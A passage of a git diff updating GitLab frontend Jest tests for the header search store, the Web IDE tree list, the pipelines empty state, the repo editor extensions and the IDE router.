'help/gitlab', + }, +]; diff --git a/spec/frontend/header_search/store/actions_spec.js b/spec/frontend/header_search/store/actions_spec.js index ee2c72df77b..6599115f017 100644 --- a/spec/frontend/header_search/store/actions_spec.js +++ b/spec/frontend/header_search/store/actions_spec.js @@ -5,7 +5,7 @@ import * as actions from '~/header_search/store/actions'; import * as types from '~/header_search/store/mutation_types'; import createState from '~/header_search/store/state'; import axios from '~/lib/utils/axios_utils'; -import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS_RES } from '../mock_data'; jest.mock('~/flash'); @@ -29,9 +29,9 @@ describe('Header Search Store Actions', () => { }); describe.each` - axiosMock | type | expectedMutations | flashCallCount - ${{ method: 'onGet', code: 200, res: MOCK_AUTOCOMPLETE_OPTIONS }} | ${'success'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_SUCCESS, payload: MOCK_AUTOCOMPLETE_OPTIONS }]} | ${0} - ${{ method: 'onGet', code: 500, res: null }} | ${'error'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_ERROR }]} | ${1} + axiosMock | type | expectedMutations | flashCallCount + ${{ method: 'onGet', code: 200, res: MOCK_AUTOCOMPLETE_OPTIONS_RES }} | ${'success'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_SUCCESS, payload: MOCK_AUTOCOMPLETE_OPTIONS_RES }]} | ${0} + ${{ method: 'onGet', code: 500, res: null }} | ${'error'} | ${[{ type: types.REQUEST_AUTOCOMPLETE }, { type: types.RECEIVE_AUTOCOMPLETE_ERROR }]} | ${1} `('fetchAutocompleteOptions', ({ axiosMock, type, expectedMutations, flashCallCount }) => { describe(`on ${type}`, () => { beforeEach(() => { @@ -47,6 +47,16 @@ describe('Header Search Store Actions', () => { }); }); + describe('clearAutocomplete', () => { + it('calls the CLEAR_AUTOCOMPLETE mutation', () => { + return testAction({ + action: actions.clearAutocomplete, + state, + expectedMutations: [{ type: types.CLEAR_AUTOCOMPLETE }], + }); + }); + }); + describe('setSearch', () => { it('calls the SET_SEARCH mutation', () => { return testAction({ diff --git a/spec/frontend/header_search/store/getters_spec.js b/spec/frontend/header_search/store/getters_spec.js index d55db07188e..35d1bf350d7 100644 --- a/spec/frontend/header_search/store/getters_spec.js +++ b/spec/frontend/header_search/store/getters_spec.js @@ -15,6 +15,7 @@ import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS, MOCK_GROUPED_AUTOCOMPLETE_OPTIONS, + MOCK_SORTED_AUTOCOMPLETE_OPTIONS, } from '../mock_data'; describe('Header Search Store Getters', () => { @@ -36,18 +37,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=undefined&group_id=undefined&scope=issues`} - ${MOCK_GROUP} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=undefined&group_id=${MOCK_GROUP.id}&scope=issues`} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} - `('searchQuery', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} + `('searchQuery', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -61,8 +64,9 @@ describe('Header Search Store Getters', () => { describe.each` project | ref | expectedPath - ${null} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=undefined&project_ref=null`} - ${MOCK_PROJECT} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}&project_ref=null`} + ${null} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}`} + ${MOCK_PROJECT} | ${null} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}`} + ${null} | ${MOCK_PROJECT.id} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_ref=${MOCK_PROJECT.id}`} ${MOCK_PROJECT} | ${MOCK_PROJECT.id} | ${`${MOCK_AUTOCOMPLETE_PATH}?term=${MOCK_SEARCH}&project_id=${MOCK_PROJECT.id}&project_ref=${MOCK_PROJECT.id}`} `('autocompleteQuery', ({ project, ref, expectedPath }) => { describe(`when project is ${project?.name} and project ref is ${ref}`, () => { @@ -131,18 +135,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${null} - ${MOCK_GROUP} | ${null} | ${null} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} - `('projectUrl', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&project_id=${MOCK_PROJECT.id}&group_id=${MOCK_GROUP.id}&scope=issues`} + `('projectUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -155,18 +161,20 @@ describe('Header Search Store Getters', () => { }); describe.each` - group | project | expectedPath - ${null} | ${null} | ${null} - ${MOCK_GROUP} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} - ${MOCK_GROUP} | ${MOCK_PROJECT} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} - `('groupUrl', ({ group, project, expectedPath }) => { - describe(`when group is ${group?.name} and project is ${project?.name}`, () => { + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&group_id=${MOCK_GROUP.id}&scope=issues`} + `('groupUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { beforeEach(() => { createState({ searchContext: { group, project, - scope: 'issues', + scope, }, }); state.search = MOCK_SEARCH; @@ -178,20 +186,29 @@ describe('Header Search Store Getters', () => { }); }); - describe('allUrl', () => { - const expectedPath = `${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&scope=issues`; - - beforeEach(() => { - createState({ - searchContext: { - scope: 'issues', - }, + describe.each` + group | project | scope | expectedPath + ${null} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${null} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${null} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${null} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar`} + ${MOCK_GROUP} | ${MOCK_PROJECT} | ${'issues'} | ${`${MOCK_SEARCH_PATH}?search=${MOCK_SEARCH}&nav_source=navbar&scope=issues`} + `('allUrl', ({ group, project, scope, expectedPath }) => { + describe(`when group is ${group?.name}, project is ${project?.name}, and scope is ${scope}`, () => { + beforeEach(() => { + createState({ + searchContext: { + group, + project, + scope, + }, + }); + state.search = MOCK_SEARCH; }); - state.search = MOCK_SEARCH; - }); - it(`should return ${expectedPath}`, () => { - expect(getters.allUrl(state)).toBe(expectedPath); + it(`should return ${expectedPath}`, () => { + expect(getters.allUrl(state)).toBe(expectedPath); + }); }); }); @@ -248,4 +265,44 @@ describe('Header Search Store Getters', () => { ); }); }); + + describe.each` + search | defaultSearchOptions | scopedSearchOptions | autocompleteGroupedSearchOptions | expectedArray + ${null} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_DEFAULT_SEARCH_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${[]} | ${MOCK_SCOPED_SEARCH_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${[]} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_SORTED_AUTOCOMPLETE_OPTIONS} + ${MOCK_SEARCH} | ${MOCK_DEFAULT_SEARCH_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS} | ${MOCK_GROUPED_AUTOCOMPLETE_OPTIONS} | ${MOCK_SCOPED_SEARCH_OPTIONS.concat(MOCK_SORTED_AUTOCOMPLETE_OPTIONS)} + `( + 'searchOptions', + ({ + search, + defaultSearchOptions, + scopedSearchOptions, + autocompleteGroupedSearchOptions, + expectedArray, + }) => { + describe(`when search is ${search} and the defaultSearchOptions${ + defaultSearchOptions.length ? '' : ' do not' + } exist, scopedSearchOptions${ + scopedSearchOptions.length ? '' : ' do not' + } exist, and autocompleteGroupedSearchOptions${ + autocompleteGroupedSearchOptions.length ? '' : ' do not' + } exist`, () => { + const mockGetters = { + defaultSearchOptions, + scopedSearchOptions, + autocompleteGroupedSearchOptions, + }; + + beforeEach(() => { + createState(); + state.search = search; + }); + + it(`should return the correct combined array`, () => { + expect(getters.searchOptions(state, mockGetters)).toStrictEqual(expectedArray); + }); + }); + }, + ); }); diff --git a/spec/frontend/header_search/store/mutations_spec.js b/spec/frontend/header_search/store/mutations_spec.js index 7f9b7631a7e..7bcf8e49118 100644 --- a/spec/frontend/header_search/store/mutations_spec.js +++ b/spec/frontend/header_search/store/mutations_spec.js @@ -1,7 +1,11 @@ import * as types from '~/header_search/store/mutation_types'; import mutations from '~/header_search/store/mutations'; import createState from '~/header_search/store/state'; -import { MOCK_SEARCH, MOCK_AUTOCOMPLETE_OPTIONS } from '../mock_data'; +import { + MOCK_SEARCH, + MOCK_AUTOCOMPLETE_OPTIONS_RES, + MOCK_AUTOCOMPLETE_OPTIONS, +} from '../mock_data'; describe('Header Search Store Mutations', () => { let state; @@ -20,8 +24,8 @@ describe('Header Search Store Mutations', () => { }); describe('RECEIVE_AUTOCOMPLETE_SUCCESS', () => { - it('sets loading to false and sets autocompleteOptions array', () => { - mutations[types.RECEIVE_AUTOCOMPLETE_SUCCESS](state, MOCK_AUTOCOMPLETE_OPTIONS); + it('sets loading to false and then formats and sets the autocompleteOptions array', () => { + mutations[types.RECEIVE_AUTOCOMPLETE_SUCCESS](state, MOCK_AUTOCOMPLETE_OPTIONS_RES); expect(state.loading).toBe(false); expect(state.autocompleteOptions).toStrictEqual(MOCK_AUTOCOMPLETE_OPTIONS); @@ -37,6 +41,14 @@ describe('Header Search Store Mutations', () => { }); }); + describe('CLEAR_AUTOCOMPLETE', () => { + it('empties autocompleteOptions array', () => { + mutations[types.CLEAR_AUTOCOMPLETE](state); + + expect(state.autocompleteOptions).toStrictEqual([]); + }); + }); + describe('SET_SEARCH', () => { it('sets search to value', () => { mutations[types.SET_SEARCH](state, MOCK_SEARCH); diff --git a/spec/frontend/ide/components/ide_tree_list_spec.js b/spec/frontend/ide/components/ide_tree_list_spec.js index 85d9feb0c09..ace51204374 100644 --- a/spec/frontend/ide/components/ide_tree_list_spec.js +++ b/spec/frontend/ide/components/ide_tree_list_spec.js @@ -38,9 +38,16 @@ describe('IDE tree list', () => { beforeEach(() => { bootstrapWithTree(); + jest.spyOn(vm, '$emit').mockImplementation(() => {}); + vm.$mount(); }); + it('emits tree-ready event', () => { + expect(vm.$emit).toHaveBeenCalledTimes(1); + expect(vm.$emit).toHaveBeenCalledWith('tree-ready'); + }); + it('renders loading indicator', (done) => { store.state.trees['abcproject/main'].loading = true; @@ -61,9 +68,15 @@ describe('IDE tree list', () => { beforeEach(() => { bootstrapWithTree(emptyBranchTree); + jest.spyOn(vm, '$emit').mockImplementation(() => {}); + vm.$mount(); }); + it('still emits tree-ready event', () => { + expect(vm.$emit).toHaveBeenCalledWith('tree-ready'); + }); + it('does not load files if the branch is empty', () => { expect(vm.$el.textContent).not.toContain('fileName'); expect(vm.$el.textContent).toContain('No files'); diff --git a/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap b/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap index 47e3a56e83d..069b6927bac 100644 --- a/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap +++ b/spec/frontend/ide/components/pipelines/__snapshots__/list_spec.js.snap @@ -6,10 +6,10 @@ exports[`IDE pipelines list when loaded renders empty state when no latestPipeli > <!----> - <empty-state-stub - cansetci="true" - class="gl-p-5" - emptystatesvgpath="http://test.host" - /> + <div + class="gl-h-full gl-display-flex gl-flex-direction-column gl-justify-content-center" + > + <empty-state-stub /> + </div> </div> `; diff --git a/spec/frontend/ide/components/pipelines/empty_state_spec.js b/spec/frontend/ide/components/pipelines/empty_state_spec.js new file mode 100644 index 00000000000..f7409fc36be --- /dev/null +++ b/spec/frontend/ide/components/pipelines/empty_state_spec.js @@ -0,0 +1,44 @@ +import { GlEmptyState } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import EmptyState from '~/ide/components/pipelines/empty_state.vue'; +import { createStore } from '~/ide/stores'; + +const TEST_PIPELINES_EMPTY_STATE_SVG_PATH = 'illustrations/test/pipelines.svg'; + +describe('~/ide/components/pipelines/empty_state.vue', () => { + let store; + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(EmptyState, { + store, + }); + }; + + beforeEach(() => { + store = createStore(); + store.dispatch('setEmptyStateSvgs', { + pipelinesEmptyStateSvgPath: TEST_PIPELINES_EMPTY_STATE_SVG_PATH, + }); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('default', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty state', () => { + expect(wrapper.find(GlEmptyState).props()).toMatchObject({ + title: EmptyState.i18n.title, + description: EmptyState.i18n.description, + primaryButtonText: EmptyState.i18n.primaryButtonText, + primaryButtonLink: '/help/ci/quick_start/index.md', + svgPath: TEST_PIPELINES_EMPTY_STATE_SVG_PATH, + }); + }); + }); +}); diff --git a/spec/frontend/ide/components/pipelines/list_spec.js b/spec/frontend/ide/components/pipelines/list_spec.js index a917f4c0230..8a3606e27eb 100644 --- a/spec/frontend/ide/components/pipelines/list_spec.js +++ b/spec/frontend/ide/components/pipelines/list_spec.js @@ -2,10 +2,10 @@ import { GlLoadingIcon, GlTab } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import Vue from 'vue'; import Vuex from 'vuex'; -import { TEST_HOST } from 'helpers/test_constants'; import { pipelines } from 'jest/ide/mock_data'; import JobsList from '~/ide/components/jobs/list.vue'; import List from '~/ide/components/pipelines/list.vue'; +import EmptyState from '~/ide/components/pipelines/empty_state.vue'; import IDEServices from '~/ide/services'; import CiIcon from '~/vue_shared/components/ci_icon.vue'; @@ -18,9 +18,6 @@ jest.mock('~/ide/services', () => ({ describe('IDE pipelines list', () => { let wrapper; - const defaultState = { - pipelinesEmptyStateSvgPath: TEST_HOST, - }; const defaultPipelinesState = { stages: [], failedStages: [], @@ -38,7 +35,6 @@ describe('IDE pipelines list', () => { currentProject: () => ({ web_url: 'some/url ', path_with_namespace: fakeProjectPath }), }, state: { - ...defaultState, ...rootState, }, modules: { @@ -131,6 +127,8 @@ describe('IDE pipelines list', () => { it('renders empty state when no latestPipeline', () => { createComponent({}, { ...defaultPipelinesLoadedState, latestPipeline: null }); + + expect(wrapper.find(EmptyState).exists()).toBe(true); expect(wrapper.element).toMatchSnapshot(); }); diff --git a/spec/frontend/ide/components/repo_editor_spec.js b/spec/frontend/ide/components/repo_editor_spec.js index c2212eea849..c957c64aa10 100644 --- a/spec/frontend/ide/components/repo_editor_spec.js +++ b/spec/frontend/ide/components/repo_editor_spec.js @@ -9,7 +9,7 @@ import waitUsingRealTimer from 'helpers/wait_using_real_timer'; import { exampleConfigs, exampleFiles } from 'jest/ide/lib/editorconfig/mock_data'; import { EDITOR_CODE_INSTANCE_FN, EDITOR_DIFF_INSTANCE_FN } from '~/editor/constants'; import { EditorMarkdownExtension } from '~/editor/extensions/source_editor_markdown_ext'; -import { EditorWebIdeExtension } from '~/editor/extensions/source_editor_webide_ext'; +import { EditorMarkdownPreviewExtension } from '~/editor/extensions/source_editor_markdown_livepreview_ext'; import SourceEditor from '~/editor/source_editor'; import RepoEditor from '~/ide/components/repo_editor.vue'; import { @@ -23,6 +23,8 @@ import service from '~/ide/services'; import { createStoreOptions } from '~/ide/stores'; import axios from '~/lib/utils/axios_utils'; import ContentViewer from '~/vue_shared/components/content_viewer/content_viewer.vue'; +import SourceEditorInstance from '~/editor/source_editor_instance'; +import { spyOnApi } from 'jest/editor/helpers'; import { file } from '../helpers'; const PREVIEW_MARKDOWN_PATH = '/foo/bar/preview_markdown'; @@ -101,6 +103,7 @@ describe('RepoEditor', () => { let createDiffInstanceSpy; let createModelSpy; let applyExtensionSpy; + let extensionsStore; const waitForEditorSetup = () => new Promise((resolve) => { @@ -120,6 +123,7 @@ describe('RepoEditor', () => { }); await waitForPromises(); vm = wrapper.vm; + extensionsStore = wrapper.vm.globalEditor.extensionsStore; jest.spyOn(vm, 'getFileData').mockResolvedValue(); jest.spyOn(vm, 'getRawFileData').mockResolvedValue(); }; @@ -127,28 +131,12 @@ describe('RepoEditor', () => { const findEditor = () => wrapper.find('[data-testid="editor-container"]'); const findTabs = () => wrapper.findAll('.ide-mode-tabs .nav-links li'); const findPreviewTab = () => wrapper.find('[data-testid="preview-tab"]'); - const expectEditorMarkdownExtension = (shouldHaveExtension) => { - if (shouldHaveExtension) { - expect(applyExtensionSpy).toHaveBeenCalledWith( - wrapper.vm.editor, - expect.any(EditorMarkdownExtension), - ); - // TODO: spying on extensions causes Jest to blow up, so we have to assert on - // the public property the extension adds, as opposed to the args passed to the ctor - expect(wrapper.vm.editor.previewMarkdownPath).toBe(PREVIEW_MARKDOWN_PATH); - } else { - expect(applyExtensionSpy).not.toHaveBeenCalledWith( - wrapper.vm.editor, - expect.any(EditorMarkdownExtension), - ); - } - }; beforeEach(() => { createInstanceSpy = jest.spyOn(SourceEditor.prototype, EDITOR_CODE_INSTANCE_FN); createDiffInstanceSpy = jest.spyOn(SourceEditor.prototype, EDITOR_DIFF_INSTANCE_FN); createModelSpy = jest.spyOn(monacoEditor, 'createModel'); - applyExtensionSpy = jest.spyOn(SourceEditor, 'instanceApplyExtension'); + applyExtensionSpy = jest.spyOn(SourceEditorInstance.prototype, 'use'); jest.spyOn(service, 'getFileData').mockResolvedValue(); jest.spyOn(service, 'getRawFileData').mockResolvedValue(); }); @@ -275,14 +263,13 @@ describe('RepoEditor', () => { ); it('installs the WebIDE extension', async () => { - const extensionSpy = jest.spyOn(SourceEditor, 'instanceApplyExtension'); await createComponent(); - expect(extensionSpy).toHaveBeenCalled(); - Reflect.ownKeys(EditorWebIdeExtension.prototype) - .filter((fn) => fn !== 'constructor') - .forEach((fn) => { - expect(vm.editor[fn]).toBe(EditorWebIdeExtension.prototype[fn]); - }); + expect(applyExtensionSpy).toHaveBeenCalled(); + const ideExtensionApi = extensionsStore.get('EditorWebIde').api; + Reflect.ownKeys(ideExtensionApi).forEach((fn) => { + expect(vm.editor[fn]).toBeDefined(); + expect(vm.editor.methods[fn]).toBe('EditorWebIde'); + }); }); it.each` @@ -301,7 +288,20 @@ describe('RepoEditor', () => { async ({ activeFile, viewer, shouldHaveMarkdownExtension } = {}) => { await createComponent({ state: { viewer }, activeFile }); - expectEditorMarkdownExtension(shouldHaveMarkdownExtension); + if (shouldHaveMarkdownExtension) { + expect(applyExtensionSpy).toHaveBeenCalledWith({ + definition: EditorMarkdownPreviewExtension, + setupOptions: { previewMarkdownPath: PREVIEW_MARKDOWN_PATH }, + }); + // TODO: spying on extensions causes Jest to blow up, so we have to assert on + // the public property the extension adds, as opposed to the args passed to the ctor + expect(wrapper.vm.editor.markdownPreview.path).toBe(PREVIEW_MARKDOWN_PATH); + } else { + expect(applyExtensionSpy).not.toHaveBeenCalledWith( + wrapper.vm.editor, + expect.any(EditorMarkdownExtension), + ); + } }, ); }); @@ -329,18 +329,6 @@ describe('RepoEditor', () => { expect(vm.model).toBe(existingModel); }); - it('adds callback methods', () => { - jest.spyOn(vm.editor, 'onPositionChange'); - jest.spyOn(vm.model, 'onChange'); - jest.spyOn(vm.model, 'updateOptions'); - - vm.setupEditor(); - - expect(vm.editor.onPositionChange).toHaveBeenCalledTimes(1); - expect(vm.model.onChange).toHaveBeenCalledTimes(1); - expect(vm.model.updateOptions).toHaveBeenCalledWith(vm.rules); - }); - it('updates state with the value of the model', () => { const newContent = 'As Gregor Samsa\n awoke one morning\n'; vm.model.setValue(newContent); @@ -366,53 +354,48 @@ describe('RepoEditor', () => { describe('editor updateDimensions', () => { let updateDimensionsSpy; - let updateDiffViewSpy; beforeEach(async () => { await createComponent(); - updateDimensionsSpy = jest.spyOn(vm.editor, 'updateDimensions'); - updateDiffViewSpy = jest.spyOn(vm.editor, 'updateDiffView').mockImplementation(); + const ext = extensionsStore.get('EditorWebIde'); + updateDimensionsSpy = jest.fn(); + spyOnApi(ext, { + updateDimensions: updateDimensionsSpy, + }); }); it('calls updateDimensions only when panelResizing is false', async () => { expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); expect(vm.$store.state.panelResizing).toBe(false); // default value vm.$store.state.panelResizing = true; await vm.$nextTick(); expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); vm.$store.state.panelResizing = false; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); vm.$store.state.panelResizing = true; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); }); it('calls updateDimensions when rightPane is toggled', async () => { expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); expect(vm.$store.state.rightPane.isOpen).toBe(false); // default value vm.$store.state.rightPane.isOpen = true; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); vm.$store.state.rightPane.isOpen = false; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(2); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(2); }); }); @@ -447,7 +430,11 @@ describe('RepoEditor', () => { activeFile: dummyFile.markdown, }); - updateDimensionsSpy = jest.spyOn(vm.editor, 'updateDimensions'); + const ext = extensionsStore.get('EditorWebIde'); + updateDimensionsSpy = jest.fn(); + spyOnApi(ext, { + updateDimensions: updateDimensionsSpy, + }); changeViewMode(FILE_VIEW_MODE_PREVIEW); await vm.$nextTick(); diff --git a/spec/frontend/ide/ide_router_spec.js b/spec/frontend/ide/ide_router_spec.js index 3fb7781b176..cd10812f8ea 100644 --- a/spec/frontend/ide/ide_router_spec.js +++ b/spec/frontend/ide/ide_router_spec.js @@ -6,6 +6,7 @@ describe('IDE router', () => { const PROJECT_NAMESPACE = 'my-group/sub-group'; const PROJECT_NAME = 'my-project'; const TEST_PATH = `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/2`; + const DEFAULT_BRANCH = 'default-main'; let store; let router; @@ -13,34 +14,46 @@ describe('IDE router', () => { beforeEach(() => { window.history.replaceState({}, '', '/'); store = createStore(); - router = createRouter(store); + router = createRouter(store, DEFAULT_BRANCH); jest.spyOn(store, 'dispatch').mockReturnValue(new Promise(() => {})); }); - [ - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/tree/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/weird:branch/name-123/-/src/tree/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/edit`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/merge_requests/2`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/2`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}`, - ].forEach((route) => { - it(`finds project path when route is "${route}"`, () => { - router.push(route); - - expect(store.dispatch).toHaveBeenCalledWith('getProjectData', { - namespace: PROJECT_NAMESPACE, - projectId: PROJECT_NAME, - }); + it.each` + route | expectedBranchId | expectedBasePath + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob/`} | ${'main'} | ${'src/blob/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob`} | ${'main'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/tree/`} | ${'main'} | ${'src/tree/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/weird:branch/name-123/-/src/tree/`} | ${'weird:branch/name-123'} | ${'src/tree/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/blob`} | ${'main'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/edit`} | ${'main'} | ${'src/edit'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/merge_requests/2`} | ${'main'} | ${'src/merge_requests/2'} + 